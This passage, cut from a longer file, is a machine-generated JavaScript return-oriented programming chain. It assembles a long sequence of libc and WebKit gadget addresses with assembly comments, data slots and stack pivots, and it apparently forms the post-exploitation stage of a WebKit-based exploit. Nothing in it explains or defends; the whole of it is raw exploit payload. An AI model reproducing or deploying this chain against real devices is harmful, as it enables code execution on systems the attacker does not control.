//cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243328, //L4408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4408: db([0, 0]); // 0x0 //L4369: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+243456, //L4411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243472, //L4412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243440, //L4410 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4410: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4411: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+243632, //L4417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+243648, //L4418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+243584, //L4414 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4414: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4415: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4416: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4417: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4418: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+243760, //L4419+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+243752, //L4419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4419: db([0, 0]); // 0x0 set_gadgets([ ropchain+243776, //L4419+24 ropchain+244728, //L4413 libc_base+764760, //pop rsi ropchain+243816, //L4420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4420: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4422: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+243936, //L4425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+243920, //L4423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4423: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L4425: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+244080, //L4428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244048, //L4426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244064, //L4427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4426: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4427: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4428: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244176, //L4430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4429: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4431: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+244280, //L4432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244296, //L4433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4432: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4433: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244472, //L4435 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244488, //L4436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244456, //L4434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4434: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4435: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4436: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244632, //L4439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244648, //L4440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244600, //L4437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4438: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4439: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4440: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+244720, //L4441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4441: db([0, 0]); // 0x0 //L4413: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+244848, //L4444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+244864, //L4445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+244832, //L4443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4443: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+244976, //L4447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245024, //L4450 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+244992, //L4448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4447: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4448: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4449: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4450: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+245136, //L4451+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+245128, //L4451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4451: db([0, 0]); // 0x0 set_gadgets([ ropchain+245152, //L4451+24 ropchain+247176, //L4446 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245192, //L4452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4452: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4453: db([120, 0]); // 0x78 set_gadget(libc_base+144605,); //pop rdi //L4454: db([120, 0]); // 0x78 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245384, //L4458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+245352, //L4456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245368, //L4457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4455: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4456: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4457: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4458: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+245440, //L4460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4460: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+245568, //L4462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+245584, //L4463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245552, //L4461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4461: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4462: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4463: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+245680, //L4465 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+245664, //L4464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4464: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4465: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+245760, //L4466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 
//pop rcx ]); //L4466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4468: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+245880, //L4471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245864, //L4469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4469: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4471: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246024, //L4474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+245992, //L4472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246008, //L4473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4472: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4473: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4474: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246096, //L4476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4476: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246152, //L4477 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4477: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246232, //L4479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4479: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4481: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246352, //L4484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246336, //L4482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4482: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4484: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246496, //L4487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+246464, //L4485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+246480, //L4486 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4485: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4486: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4487: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+246584, //L4489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4488: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4489: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+246640, //L4490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4492: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov 
[rax], rcx libc_base+764760, //pop rsi ropchain+246720, //L4494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4494: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+246824, //L4495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+246840, //L4496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4495: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4496: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+246928, //L4498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4498: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+246984, //L4499 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4499: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+247056, //L4502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4502: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+247112, //L4503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4503: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4505 //L4446: libc_base+764760, //pop rsi ropchain+247216, //L4506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4506: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4508: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+247336, //L4511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247320, //L4509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4509: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4511: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+247512, //L4514 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+247528, //L4515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+247480, //L4512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247496, //L4513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4512: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4513: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4514: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4515: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+247688, //L4519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx 
libc_base+764760, //pop rsi ropchain+247656, //L4517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247672, //L4518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4516: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4517: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4518: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4519: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247792, //L4521 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+247776, //L4520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4520: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4521: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+247888, //L4523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4522: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4523: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4524: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+247992, //L4525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248008, //L4526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4525: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4526: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 
4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+248176, //L4528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248192, //L4529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248160, //L4527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4527: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4529: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248352, //L4534 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248368, //L4535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248304, //L4531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4531: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4532: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4533: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4534: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4535: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+248480, //L4536+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+248472, //L4536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4536: db([0, 0]); // 0x0 set_gadgets([ ropchain+248496, //L4536+24 
ropchain+249536, //L4530 libc_base+764760, //pop rsi ropchain+248536, //L4537 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4537: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4539: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+248656, //L4542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248640, //L4540 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4540: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4542: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+248832, //L4545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+248848, //L4546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+248800, //L4543 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+248816, //L4544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4543: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4544: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4545: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4546: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+248944, //L4548 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+248928, //L4547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4547: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4548: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4549: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4550: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4551: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+249144, //L4553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4553: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+249200, //L4554 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4554: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+249336, //L4558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249320, //L4557 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4556: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4557: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4558: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+249424, //L4559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] 
